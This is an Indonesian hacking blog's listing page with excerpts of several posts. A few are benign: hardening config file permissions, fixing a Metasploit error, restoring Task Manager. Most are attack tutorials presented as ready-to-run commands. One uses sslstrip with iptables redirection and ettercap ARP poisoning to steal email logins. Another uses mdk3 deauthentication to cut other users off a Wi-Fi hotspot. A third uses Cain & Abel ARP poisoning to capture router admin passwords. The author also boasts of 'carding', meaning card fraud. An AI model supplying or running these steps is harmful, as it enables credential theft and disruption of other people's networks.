Posts

Membuat akses forbidden pada file atau folder di website

Image
Mengamankan Situs dari Symlink/Teknik Symlink -  Jumping dan Symlink adalah salah satu teknik dari seorang attacker untuk menyerang sebuah Website dari dalam server tempat web tersebut ngehost. umumnya para attacker akan melihat config dari Website tersebut sebagai alat untuk masuk ke dalam database dan merubah password admin. kesimpulannya, teknik jumping dan symlink akan berhasil jika mereka bisa melihat config yang berisi username dan nama database dari website anda.  jika mereka tidak bise menemukan atau tidak bisa membaca file config dari Website anda maka teknik tersebut gagal di lakukan dan website anda akan aman dari serangan attacker. Berikut Step2nya : Step 1 : Login pada akun Hosting/cPanel anda sekalian Step 2 : Pergi ke FILE MANAGER . Step 3 : Kemudian cari File Configuration Website   anda, dan Ubah CHMOD/Permision dari 0644 menjadi 0400 . nb :  atau kalau tidak ingin file configuration diambil hacker lain bisa kok lewat shell backdoor dengan c...

Mengatasi metasploit error setelah di update

Image
Sudah lama blog ini tidak terurus sekarang admin akan mencoba membangun lagi ini blog wkwkwkwkwk . . . . . . kali ini saya akan memposting bagaimana cara mengatasi metasploit error setelah di update  Apabila terjadi error seperti ini [*] Deprecation Note: After 2013-03-15 (March 15, 2013), Metasploit [*] source checkouts will NO LONGER update over SVN, but will be using [*] GitHub exclusively. You should either download a new Metasploit [*] installer, or use a git clone of Metasploit Framework before [*] then. You will also need outbound access to github.com on [*] TCP port 9418 (git), 22 (ssh) or 443 (https), depending on the [*] protocol used to clone Metasploit Framework (usually, git protocol). /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36:in `require': /opt/metasploit/msf3/lib/msf/util/exe.rb:2: syntax error, unexpected tLSHFT (SyntaxError) <<<<<<< .mine   ^     from /opt/metasploit/ruby/lib/ruby/site_ruby/...

cara mengatasi task manager yang hilang

Image
Task manager banyak sekali fungsinya, antara lain adalah untuk mengetahui program apa saja yang sedang berjalan atau sedang aktif, mematikan program secara paksa, bisa juga untuk memonitor performance computer, mematikan proses suatu services, melakukan perintah restart, shutdown, logoff, membuka suatu program atau aplikasi kala terjadi desktop blank atau windows explorer error , dan masih banyak lagi. Namun ada kalanya saat kita membutuhkan task manager, task manager ini tidak bisa dibuka dengan ditandai pesan task manager has been disabled by your administrator. Hal ini bisa disebabkan oleh beberapa kemungkinan, yaitu task manager dikunci oleh administrator sehingga tidak bisa dibuka oleh user lain. Penyebab lain adalah dikarenakan virus trojan yang menyerang komputer dan menonaktifkan task manager. Task Manager adalah fitur Windows anda yang berisi informasi aplikasi-aplikasi yang sedang dijalankan pada sistem di komputer anda, juga terdapat informasi sistem la...

Hacking email dengan teknik sslStrip

Image
D i sini dalam tutorial ini saya akan menjelaskan bagaimana untuk memecahkan enkripsi SSL tanpa melanggar enkripsi SSL menggunakan Man in the middle Attack untuk mencuri email dalam satu jaringan 1.Buka terminal lalu ketikkan perintah echo 1 > /proc/sys/net/ipv4/ip_forward 2.ketikkan perintah selanjutnya   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321 3.ketikkan perintah berikutnya   cd /pentest/web/sslstrip 4.ketikkan perintah berikutnya  python sslstrip.py -p -l 54321 5.sekarang coba bikin log nya dengan ettercap ketikkan terminal dengan perintah ettercap -T -M arp // // -i wlan1 -l dumpfile -q -P autoadd   ket = wlan1 adalah interface yang saya gunakan sesuaikan interface kalian Fungsi ettercap autoadd adalah apabila ada client yang baru konek hotspot maka otomatis akan di racuni IP client tersebut dan Tunggu hingga korban login di salah satu website Sekian tutor hacking email dan akses login pada web browse...

Memblokir koneksi ke access point sebuah hotspot menggunakan mdk3 dan fitur mdk3

Image
tutor kali ini bagaimana cara memblokir user untuk mengakses ke akses point  supaya tidak ada seorangpun kecuali kita yang dapat konek ke access point tersebut (wifi) langsung saja yaappzzz. . . 1. Memblokir akses kecuali mac address kita (Pc kita) pertama-tama cek mac address kita dengan membuka terminal dan ketikkan perintah ifconfig wlan0 copy mac address kalian buka editor bisa ketikkan pada terminal perintah gedit lalu  pastekan mac address kalian dan simpan dengan nama whitelist.txt (atau lainya terserah anda)jangan lupa taruh di directory root  dan aktifkan mode monitor pada wireless,nanti muncul mon0 ketikkan perintah airmon-ng start wlan0 disini kartu wireless saya pada wlan0 , untuk mengecek kartu wireless kalian bisa mengetikkan perintah airmon-ng Sekarang tinggal mengeksekusinya buka terminal ketikkan perintah mdk3 mon0 d -w whitelist.txt dan sukses....dan yang bisa konek pada access point tersebut cuma kalian saja yang lainya bakalan disconnect dan tidak d...

Hack login page pada akses point (router),modem,login email dll dengan Ettercap atau cain n able

Image
Kali ini saya sempatkan posting untuk kalian.Sory akhir - akhir ini jarang posting di karenakan sibuk carding  sampai ni blog tidak keurus langsung saja sesuai judul 1. Menggunakan cain n able    bisa di download programnya Cain n able buka programnya lalu klik star sniff lalu pindah ke tab sniffer dan klik tanda + untuk mulai scan ipdan start Lalu muncul ip yang keluar sekarang pindah ke tab ARP dan klik pada kolom lalu klik tanda + pada panel di atas untuk memasukkan ke daftar poisoning lalu muncul kolom ip klik di sebelah kiri ip gateway(ip modemnya) nya dan blok semua ip yang ada di kolom kanan lalu klik start arp yang ada di panel atas untuk memulai meracuni ip dan tunggu hingga admin login masuk ke akses point atau modemnya untuk mensetting atau melihat - lihat host yang pernah menggunakan hotspotnya disini kita tinggal menunggu saja dengan sabar sampai admin login ke akses point / modemnya upsss...... admin ternyata login dan username , passwordnya terekam oleh sn...